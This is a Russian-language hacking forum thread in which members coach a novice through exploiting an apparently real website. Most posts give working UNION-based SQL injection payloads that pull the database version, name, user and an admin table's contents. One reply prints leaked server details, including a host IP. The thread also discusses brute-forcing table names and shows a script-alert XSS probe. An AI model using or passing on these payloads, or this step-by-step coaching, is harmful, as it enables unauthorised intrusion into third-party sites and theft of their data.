Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
     
  2. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу:
    Code:
    http://www.site.ru/vn84.php?id=’ OR ’1’=’1’
    Выдает такая ошибка:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2
    на сколько это серьезная ошибка и можно ли раскрутить это дальше ?

    а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
     
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2B1t.exe
    Code:
    id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,version())+--+
    мне кажется там можно замутить инклюд или читалку файлов
     
  4. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Scipio
    угу. теперь вроде версия да появился ?
    Code:
    http://www.site.ru/vn84.php?id=id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,  concat(0x27,version())+--+
    выдает:
    Code:
    error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4.1.22'' at line 2
    получется иммем MySQL версии 4.1.22 ?
     
  5. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ну получается что так :)
     
  6. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    2B1t.exe

    Code:
    id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+
     
  7. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    z00MAN

    че-то не каннает ! :(
    делаю такой запрос:
    Code:
    http://www.site.ru/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+
    но получаю такое:
    Code:
    error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 2
     
  8. Adm1n4eG

    Adm1n4eG Member

    Joined:
    27 Mar 2009
    Messages:
    24
    Likes Received:
    13
    Reputations:
    6
    2B1t.exe
    попробуй вместо + использовать /**/ или в конеце вместо -- ставить например /* или вместо -1 поставь 9999999999 или 1' пробуй разные вариаты...
     
  9. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Ну и че те не канает?
    Выдалож id==1
     
  10. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Adm1n4eG

    пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте !
    вот только при запросе:
    http://www.site.ru/index.php?id=1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+

    получил уже такое :)
    жель не знаю как юзать дальше...
    -------
    Кстати, если ввести такое:
    http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина:)
    [​IMG]
    И как я понял - это говорит о потенциальном XSS опасности.
     
    #10190 B1t.exe, 20 Nov 2009
    Last edited: 20 Nov 2009
  11. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Tсли есть вывод из sql-inj данных на страницу(ну блин, любую строку можно внедрить в html а броузер потом её обработает), то всегда есть опасность xss. в твоем случае я вижу обрезание тега <script>
     
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    У него ИЕ обрезает теги
     
  13. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    получаеться все? не получиться раскрутить это?
     
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
     
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Ну тут скуля, тебе ж уже отписали выше

    http://www.ru/vn84.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,concat_ws(0x2F,version(),database(),user()))+from+admin+limit+0,1--+

    4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223

    Подбирай названия столбцов таблицы admin
     
    #10195 ElteRUS, 21 Nov 2009
    Last edited: 21 Nov 2009
  16. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    ElteRUS

    ого )) спасибо. получил точно такое:
    '4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''

    Не хочу выгядеть тупым, но не знаю я парвильно думаю?
    4.1.22 - version
    cctvline_dbb - database
    cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)

    а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
    получается, что blind SQL ?

    а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
     
  17. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Я думал,у тебядве ощибки вместе было(про тфтп и эту хрень).Значит,у меня было что-то другое.Без скрина всё равно не пойму).
     
  18. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ты не видишь в какой они последовательности написанны при sql инъекции? :confused: И что тут не понятного...

    Быть может они предположили и попробовали?! Такой метод называется ручной брут...

    Какой ещё блайнд? Вывод на месте...

    Ручной брут + процесс можно автоматизировать, иногда в зависимости от особенности основного запроса можно узнать таблицы при помощи procedure analise() и т.д. и т.п.
     
  19. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    Просто MySQL-сервер установлен не на локалхосте, а на удаленной машине. MySQL-сервер имеет адрес
    Code:
    212.193.224.223
    и имя пользователя, используемого при коннекте
    Code:
    cctvline_cctv
    Так как 4 версия мускула, то таблиц INFORMATION_SCHEMA нет, следовательно таблицы и колонки узнать можно только брутом(ручным или же разными скриптами, которые выкладывали в кодинге. Вроде SIPT тоже умеет)
     
    1 person likes this.
  20. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
     
Loading...
Thread Status:
Not open for further replies.